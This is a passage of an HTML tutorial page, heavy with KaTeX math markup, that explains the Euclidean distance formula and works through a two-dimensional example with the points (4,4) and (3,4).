&lt;p&gt;Don&#39;t worry - we&#39;ll go through this step by step. The big fancy sigma (&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi mathvariant=&quot;normal&quot;&gt;Σ&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;Sigma&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.68333em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;Σ&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;) letter makes this quite confusing, but it&#39;s saying that we&#39;ll generate a squared number for the result after subtracting each dimension from our two points &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, then make &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; the square root of the total. We&#39;re popping it here now because later in the article we&#39;ll be contemplating vectors with hundreds of dimensions, and also it looks so cool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Given &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p=(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q=(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, we can calculate &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; within a less generalised two-dimensional vector space. This makes &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;n = 2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.43056em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, and our resulting formula becomes &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d(p,q) = &#92;sqrt{(q_1 - p_1)^2 + (q_2 - p_2)^2}&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1.24em;vertical-align:-0.30499999999999994em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.935em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3.2em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.2em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:1em;&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8950000000000005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.2em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:1.02em;height:1.28em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.28em&quot; viewBox=&quot;0 0 400000 1296&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M263,681c0.7,0,18,39.7,52,119
c34,79.3,68.167,158.7,102.5,238c34.3,79.3,51.8,119.3,52.5,120
c340,-704.7,510.7,-1060.3,512,-1067
l0 -0
c4.7,-7.3,11,-11,19,-11
H40000v40H1012.3
s-271.3,567,-271.3,567c-38.7,80.7,-84,175,-136,283c-52,108,-89.167,185.3,-111.5,232
c-22.3,46.7,-33.8,70.3,-34.5,71c-4.7,4.7,-12.3,7,-23,7s-12,-1,-12,-1
s-109,-253,-109,-253c-72.7,-168,-109.3,-252,-110,-252c-10.7,8,-22,16.7,-34,26
c-22,17.3,-33.3,26,-34,26s-26,-26,-26,-26s76,-59,76,-59s76,-60,76,-60z
M1001 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30499999999999994em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. Which is a bit easier to read.&lt;/p&gt;
&lt;p&gt;We substitute in our values to calculate the differences for each dimension of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mtable rowspacing=&quot;0.24999999999999992em&quot; columnalign=&quot;right left&quot; columnspacing=&quot;0em&quot;&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;begin{aligned}
(q_1 - p_1)^2 = (4 - 3)^2 = 1^2 &amp;amp;= 1 &#92;&#92;
(q_2 - p_2)^2 = (4 - 4)^2 = 0^2 &amp;amp;= 0
&#92;end{aligned}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:3.048216em;vertical-align:-1.274108em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mtable&quot;&gt;&lt;span class=&quot;col-align-r&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.774108em;&quot;&gt;&lt;span style=&quot;top:-3.91em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t 